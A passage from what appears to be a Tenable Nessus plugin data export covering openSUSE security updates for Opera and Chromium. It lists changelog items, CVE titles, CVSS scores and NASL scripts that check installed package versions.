["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "701236.PRM", "href": "https://www.tenable.com/plugins/nnm/701236", "sourceData": "Binary data 701236.prm", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:31:50", "description": "This update for opera fixes the following issues :\n\nOpera was updated to version 65.0.3467.62\n\n - CHR-7658 Update chromium on desktop-stable-78-3467 to 78.0.3904.108\n\n - DNA-81387 Remove support for old bundle structure in signing scripts\n\n - DNA-81675 Update widevine signature localisation in signed packages\n\n - DNA-81884 [Advanced content blocking] Ads are blocked for whitelisted page in Incognito\n\n - 
DNA-82230 [Mac] URL is not correctly aligned when the Geolocation is ON\n\n - DNA-82368 Generating diffs for unsinged packages doesn’t work\n\n - DNA-82414 Wrong number of trackers displayed just after deactivating adblocker\n\n - DNA-82470 [Linux] Snap package doesn’t recognise GNOME 3.24 platform snap connection\n\n - DNA-82473 https://www.nba.com/standings not working with AdBlocker enabled\n\n - DNA-82484 Update content blocking icon\n\n - DNA-82485 [Mac 10.15] Opera installer error at the end of installation process\n\n - DNA-82508 [Adblocker] Predefault lists can not be unchecked\n\n - DNA-82557 Address bar dropdown launches HTTP GETs for every autocomplete\n\n - DNA-82596 Do not block first-party ‘trackers’\n\n - DNA-82616 Settings – Tracker Blocker – Add “Learn more” link\n\n - DNA-82626 [Win] High CPU usage due to media indicator animation\n\n - DNA-82647 Tab icons mixed after Tab closing\n\n - DNA-82742 Pages won’t load after closing private mode\n\n - DNA-82768 Mark also the reference group in “exp” header for DNA-81658\n\n - DNA-82840 Disable favicon fetching for typed URLs\n\nComplete Opera 65.0 changelog at :\n\nhttps://blogs.opera.com/desktop/changelog-for-65/\n\nUpdate to version 64.0.3417.92\n\n - DNA-81358 Wrong key color on extension popup in dark mode\n\n - DNA-82208 Cherry-pick CVE-2019-13721 and CVE-2019-13720\n\nUpdate to version 64.0.3417.83\n\n - DNA-79676 Use FFmpegDemuxer to demux ADTS\n\n - DNA-81010 Spinner takes a lot of cpu\n\n - DNA-81385 Keys on some popups in dark mode can’t be hovered\n\n - DNA-81494 [Mac] Snap onboarding doesn’t appear while the icon still flashes\n\n - DNA-82003 Restore legacy path for AudioFileReader\n\n - DNA-82019 Enable #ffmpeg-demuxer-everywhere by default in developer\n\n - DNA-82028 Enable #ffmpeg-demuxer-everywhere by default in stable on macOS\n\nUpdate to version 64.0.3417.73\n\n - CHR-7598 Update chromium on desktop-stable-77-3417 to 77.0.3865.120\n\n - DNA-80049 The upper border of “Add to bookmarks 
bar” popup is cut off in white mode\n\n - DNA-80395 Menu popup borders in Settings are invisible in Dark mode\n\n - DNA-81263 Change the continue section buttons visibility as in description\n\n - DNA-81304 Crash at chrome::NewTab(Browser*)\n\n - DNA-81650 Easy Setup Style looks weird\n\n - DNA-81708 Missing dependency on //chrome/common:buildflags\n\n - DNA-81732 [Mac][Catalina] Cannot maximize a window after it’s been minimized\n\n - DNA-81737 Renderer crash on https://codesandbox.io/s/vanilla-ts\n\n - DNA-81753 Pinned tab only remembered after next restart\n\n - DNA-81769 Investigate reports about slow speed dial loading in O64 blog comments\n\n - DNA-81859 [Mac 10.15] Crash whenever navigating to any page\n\n - DNA-81893 Get Personalised news on SpeedDials broken layout\n\nUpdate to version 64.0.3417.61\n\n - DNA-80760 Sidebar Messenger icon update\n\n - DNA-81165 Remove sharing service\n\n - DNA-81211 [Advanced content blocking] Can not turn off ad blocking in private mode\n\n - DNA-81323 content_filter::RendererConfigProvider destroyed on wrong sequence\n\n - DNA-81487 [VPN disclaimer][da, ta] Text should be multiline\n\n - DNA-81545 opr-session entry for Google ads not working\n\n - DNA-81580 Speed dials’ colours change after Opera update\n\n - DNA-81597 [Adblocker] Google Ads link hides if clicking\n\n - DNA-81639 Widevine verification status is PLATFORM_TAMPERED\n\n - DNA-81237 [Advanced content blocking] noCoinis not enabled by default\n\n - DNA-81375 Adblocking_AddToWhitelist_Popup and Adblocking_RemoveFromWhitelist_Popup metric not recorded in stats\n\n - DNA-81413 Error in console when Start Page connects to My Flow\n\n - DNA-81435 Adjust VPN disclaimer to longer strings [de]\n\nUpdate to version 64.0.3417.47\n\n - DNA-80531 [Reborn3] Unify Switches\n\n - DNA-80738 “How to protect my privacy” link\n\n - DNA-81162 Enable #advanced-content-blocking on developer stream\n\n - DNA-81202 Privacy Protection popup doesn’t resize after enabling blockers\n\n - 
DNA-81230 [Mac] Drop support for 10.10\n\n - DNA-81280 Adjust button width to the shorter string\n\n - DNA-81295 Opera 64 translations\n\n - DNA-81346 Enable #advanced-content-blocking on all streams\n\n - DNA-81434 Turn on #new-vpn-flow in all streams\n\n - DNA-81436 Import translations from Chromium to O64\n\n - DNA-81460 Promote O64 to stable\n\n - DNA-81461 Snap onboarding is cut\n\n - DNA-81467 Integrate missing translations (Chinese, MS and TL) to O64/65\n\n - DNA-81489 Start page goes into infinite loop\n\nComplete Opera 64.0 changelog at:\nhttps://blogs.opera.com/desktop/changelog-for-64/\n\nUpdate to version 63.0.3368.94\n\n - CHR-7516 Update chromium on master to 78.0.3887.7\n\n - DNA-80966 [Linux] Integrate a new key into our packages\n\nUpdate to version 63.0.3368.88\n\n - DNA-79103 Saving link to bookmarks saves it to Other bookmarks folder\n\n - DNA-79455 Crash at views::MenuController::\n FindNextSelectableMenuItem(views::MenuItemView*, int, views:: MenuController::SelectionIncrementDirectionType, bool)\n\n - DNA-79579 Continuous packages using new_mac_bundle_structure do not run\n\n - DNA-79611 Update opauto_paths.py:GetResourcesDir\n\n - DNA-79621 Add support for new bundle structure to old autoupdate clients\n\n - DNA-79906 Fix package build\n\n - DNA-80131 Sign Opera Helper(GPU).app\n\n - DNA-80191 Fix opera_components/tracking_data/tracking_data_paths.cc\n\n - DNA-80638 Cherry-pick fix for CreditCardTest.\n UpdateFromImportedCard_ExpiredVerifiedCardUpdatedWithSam eName\n\n - DNA-80801 Very slow tab deletion process", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": 
"2019-12-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : opera (openSUSE-2019-2664)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2664.NASL", "href": "https://www.tenable.com/plugins/nessus/131922", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2664.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131922);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"openSUSE Security Update : opera (openSUSE-2019-2664)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for opera fixes the following issues :\n\nOpera was updated to version 65.0.3467.62\n\n - CHR-7658 Update chromium on desktop-stable-78-3467 to\n 78.0.3904.108\n\n - DNA-81387 Remove support for old bundle structure in\n 
signing scripts\n\n - DNA-81675 Update widevine signature localisation in\n signed packages\n\n - DNA-81884 [Advanced content blocking] Ads are blocked\n for whitelisted page in Incognito\n\n - DNA-82230 [Mac] URL is not correctly aligned when the\n Geolocation is ON\n\n - DNA-82368 Generating diffs for unsinged packages\n doesn’t work\n\n - DNA-82414 Wrong number of trackers displayed just after\n deactivating adblocker\n\n - DNA-82470 [Linux] Snap package doesn’t recognise\n GNOME 3.24 platform snap connection\n\n - DNA-82473 https://www.nba.com/standings not working with\n AdBlocker enabled\n\n - DNA-82484 Update content blocking icon\n\n - DNA-82485 [Mac 10.15] Opera installer error at the end\n of installation process\n\n - DNA-82508 [Adblocker] Predefault lists can not be\n unchecked\n\n - DNA-82557 Address bar dropdown launches HTTP GETs for\n every autocomplete\n\n - DNA-82596 Do not block first-party\n ‘trackers’\n\n - DNA-82616 Settings – Tracker Blocker – Add\n “Learn more” link\n\n - DNA-82626 [Win] High CPU usage due to media indicator\n animation\n\n - DNA-82647 Tab icons mixed after Tab closing\n\n - DNA-82742 Pages won’t load after closing private\n mode\n\n - DNA-82768 Mark also the reference group in\n “exp” header for DNA-81658\n\n - DNA-82840 Disable favicon fetching for typed URLs\n\nComplete Opera 65.0 changelog at :\n\nhttps://blogs.opera.com/desktop/changelog-for-65/\n\nUpdate to version 64.0.3417.92\n\n - DNA-81358 Wrong key color on extension popup in dark\n mode\n\n - DNA-82208 Cherry-pick CVE-2019-13721 and CVE-2019-13720\n\nUpdate to version 64.0.3417.83\n\n - DNA-79676 Use FFmpegDemuxer to demux ADTS\n\n - DNA-81010 Spinner takes a lot of cpu\n\n - DNA-81385 Keys on some popups in dark mode can’t\n be hovered\n\n - DNA-81494 [Mac] Snap onboarding doesn’t appear\n while the icon still flashes\n\n - DNA-82003 Restore legacy path for AudioFileReader\n\n - DNA-82019 Enable #ffmpeg-demuxer-everywhere by default\n in developer\n\n - 
DNA-82028 Enable #ffmpeg-demuxer-everywhere by default\n in stable on macOS\n\nUpdate to version 64.0.3417.73\n\n - CHR-7598 Update chromium on desktop-stable-77-3417 to\n 77.0.3865.120\n\n - DNA-80049 The upper border of “Add to bookmarks\n bar” popup is cut off in white mode\n\n - DNA-80395 Menu popup borders in Settings are invisible\n in Dark mode\n\n - DNA-81263 Change the continue section buttons visibility\n as in description\n\n - DNA-81304 Crash at chrome::NewTab(Browser*)\n\n - DNA-81650 Easy Setup Style looks weird\n\n - DNA-81708 Missing dependency on\n //chrome/common:buildflags\n\n - DNA-81732 [Mac][Catalina] Cannot maximize a window after\n it’s been minimized\n\n - DNA-81737 Renderer crash on\n https://codesandbox.io/s/vanilla-ts\n\n - DNA-81753 Pinned tab only remembered after next restart\n\n - DNA-81769 Investigate reports about slow speed dial\n loading in O64 blog comments\n\n - DNA-81859 [Mac 10.15] Crash whenever navigating to any\n page\n\n - DNA-81893 Get Personalised news on SpeedDials broken\n layout\n\nUpdate to version 64.0.3417.61\n\n - DNA-80760 Sidebar Messenger icon update\n\n - DNA-81165 Remove sharing service\n\n - DNA-81211 [Advanced content blocking] Can not turn off\n ad blocking in private mode\n\n - DNA-81323 content_filter::RendererConfigProvider\n destroyed on wrong sequence\n\n - DNA-81487 [VPN disclaimer][da, ta] Text should be\n multiline\n\n - DNA-81545 opr-session entry for Google ads not working\n\n - DNA-81580 Speed dials’ colours change after Opera\n update\n\n - DNA-81597 [Adblocker] Google Ads link hides if clicking\n\n - DNA-81639 Widevine verification status is\n PLATFORM_TAMPERED\n\n - DNA-81237 [Advanced content blocking] noCoinis not\n enabled by default\n\n - DNA-81375 Adblocking_AddToWhitelist_Popup and\n Adblocking_RemoveFromWhitelist_Popup metric not recorded\n in stats\n\n - DNA-81413 Error in console when Start Page connects to\n My Flow\n\n - DNA-81435 Adjust VPN disclaimer to longer strings 
[de]\n\nUpdate to version 64.0.3417.47\n\n - DNA-80531 [Reborn3] Unify Switches\n\n - DNA-80738 “How to protect my privacy” link\n\n - DNA-81162 Enable #advanced-content-blocking on developer\n stream\n\n - DNA-81202 Privacy Protection popup doesn’t resize\n after enabling blockers\n\n - DNA-81230 [Mac] Drop support for 10.10\n\n - DNA-81280 Adjust button width to the shorter string\n\n - DNA-81295 Opera 64 translations\n\n - DNA-81346 Enable #advanced-content-blocking on all\n streams\n\n - DNA-81434 Turn on #new-vpn-flow in all streams\n\n - DNA-81436 Import translations from Chromium to O64\n\n - DNA-81460 Promote O64 to stable\n\n - DNA-81461 Snap onboarding is cut\n\n - DNA-81467 Integrate missing translations (Chinese, MS\n and TL) to O64/65\n\n - DNA-81489 Start page goes into infinite loop\n\nComplete Opera 64.0 changelog at:\nhttps://blogs.opera.com/desktop/changelog-for-64/\n\nUpdate to version 63.0.3368.94\n\n - CHR-7516 Update chromium on master to 78.0.3887.7\n\n - DNA-80966 [Linux] Integrate a new key into our packages\n\nUpdate to version 63.0.3368.88\n\n - DNA-79103 Saving link to bookmarks saves it to Other\n bookmarks folder\n\n - DNA-79455 Crash at views::MenuController::\n FindNextSelectableMenuItem(views::MenuItemView*, int,\n views:: MenuController::SelectionIncrementDirectionType,\n bool)\n\n - DNA-79579 Continuous packages using\n new_mac_bundle_structure do not run\n\n - DNA-79611 Update opauto_paths.py:GetResourcesDir\n\n - DNA-79621 Add support for new bundle structure to old\n autoupdate clients\n\n - DNA-79906 Fix package build\n\n - DNA-80131 Sign Opera Helper(GPU).app\n\n - DNA-80191 Fix\n opera_components/tracking_data/tracking_data_paths.cc\n\n - DNA-80638 Cherry-pick fix for CreditCardTest.\n UpdateFromImportedCard_ExpiredVerifiedCardUpdatedWithSam\n eName\n\n - DNA-80801 Very slow tab deletion process\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.opera.com/desktop/changelog-for-64/\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://blogs.opera.com/desktop/changelog-for-65/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://codesandbox.io/s/vanilla-ts\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nba.com/standings\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"opera-65.0.3467.62-lp151.2.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:13", "description": "This update for chromium fixes the following issues :\n\nUpdate to 89.0.4389.72 (boo#1182358, boo#1182960) :\n\n - CVE-2021-21159: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21160: Heap buffer overflow in WebAudio.\n\n - CVE-2021-21161: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21162: Use after free in WebRTC.\n\n - CVE-2021-21163: Insufficient data validation in Reader Mode.\n\n - CVE-2021-21164: Insufficient data validation in Chrome for iOS.\n\n - CVE-2021-21165: Object lifecycle issue in audio.\n\n - CVE-2021-21166: Object lifecycle issue in audio.\n\n - CVE-2021-21167: Use after free in bookmarks.\n\n 
- CVE-2021-21168: Insufficient policy enforcement in appcache.\n\n - CVE-2021-21169: Out of bounds memory access in V8.\n\n - CVE-2021-21170: Incorrect security UI in Loader.\n\n - CVE-2021-21171: Incorrect security UI in TabStrip and Navigation.\n\n - CVE-2021-21172: Insufficient policy enforcement in File System API.\n\n - CVE-2021-21173: Side-channel information leakage in Network Internals.\n\n - CVE-2021-21174: Inappropriate implementation in Referrer.\n\n - CVE-2021-21175: Inappropriate implementation in Site isolation.\n\n - CVE-2021-21176: Inappropriate implementation in full screen mode.\n\n - CVE-2021-21177: Insufficient policy enforcement in Autofill.\n\n - CVE-2021-21178: Inappropriate implementation in Compositing.\n\n - CVE-2021-21179: Use after free in Network Internals.\n\n - CVE-2021-21180: Use after free in tab search.\n\n - CVE-2020-27844: Heap buffer overflow in OpenJPEG.\n\n - CVE-2021-21181: Side-channel information leakage in autofill.\n\n - CVE-2021-21182: Insufficient policy enforcement in navigations.\n\n - CVE-2021-21183: Inappropriate implementation in performance APIs.\n\n - CVE-2021-21184: Inappropriate implementation in performance APIs.\n\n - CVE-2021-21185: Insufficient policy enforcement in extensions.\n\n - CVE-2021-21186: Insufficient policy enforcement in QR scanning.\n\n - CVE-2021-21187: Insufficient data validation in URL formatting.\n\n - CVE-2021-21188: Use after free in Blink.\n\n - CVE-2021-21189: Insufficient policy enforcement in payments.\n\n - CVE-2021-21190: Uninitialized Use in PDFium.\n\n - CVE-2021-21149: Stack overflow in Data Transfer.\n\n - CVE-2021-21150: Use after free in Downloads.\n\n - CVE-2021-21151: Use after free in Payments.\n\n - CVE-2021-21152: Heap buffer overflow in Media.\n\n - CVE-2021-21153: Stack overflow in GPU Process. 
\n\n - CVE-2021-21154: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21155: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21156: Heap buffer overflow in V8.\n\n - CVE-2021-21157: Use after free in Web Sockets. \n\n - Fixed Sandbox with glibc 2.33 (boo#1182233)\n\n - Fixed an issue where chromium hangs on opening (boo#1182775).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2021-392)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", 
"CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-05-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-392.NASL", "href": "https://www.tenable.com/plugins/nessus/147606", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-392.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147606);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21149\",\n \"CVE-2021-21150\",\n \"CVE-2021-21151\",\n \"CVE-2021-21152\",\n \"CVE-2021-21153\",\n \"CVE-2021-21154\",\n \"CVE-2021-21155\",\n \"CVE-2021-21156\",\n \"CVE-2021-21157\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n 
script_name(english:\"openSUSE Security Update : chromium (openSUSE-2021-392)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\nUpdate to 89.0.4389.72 (boo#1182358, boo#1182960) :\n\n - CVE-2021-21159: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21160: Heap buffer overflow in WebAudio.\n\n - CVE-2021-21161: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21162: Use after free in WebRTC.\n\n - CVE-2021-21163: Insufficient data validation in Reader\n Mode.\n\n - CVE-2021-21164: Insufficient data validation in Chrome\n for iOS.\n\n - CVE-2021-21165: Object lifecycle issue in audio.\n\n - CVE-2021-21166: Object lifecycle issue in audio.\n\n - CVE-2021-21167: Use after free in bookmarks.\n\n - CVE-2021-21168: Insufficient policy enforcement in\n appcache.\n\n - CVE-2021-21169: Out of bounds memory access in V8.\n\n - CVE-2021-21170: Incorrect security UI in Loader.\n\n - CVE-2021-21171: Incorrect security UI in TabStrip and\n Navigation.\n\n - CVE-2021-21172: Insufficient policy enforcement in File\n System API.\n\n - CVE-2021-21173: Side-channel information leakage in\n Network Internals.\n\n - CVE-2021-21174: Inappropriate implementation in\n Referrer.\n\n - CVE-2021-21175: Inappropriate implementation in Site\n isolation.\n\n - CVE-2021-21176: Inappropriate implementation in full\n screen mode.\n\n - CVE-2021-21177: Insufficient policy enforcement in\n Autofill.\n\n - CVE-2021-21178: Inappropriate implementation in\n Compositing.\n\n - CVE-2021-21179: Use after free in Network Internals.\n\n - CVE-2021-21180: Use after free in tab search.\n\n - CVE-2020-27844: Heap buffer overflow in OpenJPEG.\n\n - CVE-2021-21181: Side-channel information leakage in\n autofill.\n\n - CVE-2021-21182: Insufficient policy enforcement in\n navigations.\n\n - CVE-2021-21183: Inappropriate 
implementation in\n performance APIs.\n\n - CVE-2021-21184: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21185: Insufficient policy enforcement in\n extensions.\n\n - CVE-2021-21186: Insufficient policy enforcement in QR\n scanning.\n\n - CVE-2021-21187: Insufficient data validation in URL\n formatting.\n\n - CVE-2021-21188: Use after free in Blink.\n\n - CVE-2021-21189: Insufficient policy enforcement in\n payments.\n\n - CVE-2021-21190: Uninitialized Use in PDFium.\n\n - CVE-2021-21149: Stack overflow in Data Transfer.\n\n - CVE-2021-21150: Use after free in Downloads.\n\n - CVE-2021-21151: Use after free in Payments.\n\n - CVE-2021-21152: Heap buffer overflow in Media.\n\n - CVE-2021-21153: Stack overflow in GPU Process. \n\n - CVE-2021-21154: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21155: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21156: Heap buffer overflow in V8.\n\n - CVE-2021-21157: Use after free in Web Sockets. \n\n - Fixed Sandbox with glibc 2.33 (boo#1182233)\n\n - Fixed an issue where chromium hangs on opening\n (boo#1182775).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182233\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182358\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182775\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21155\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
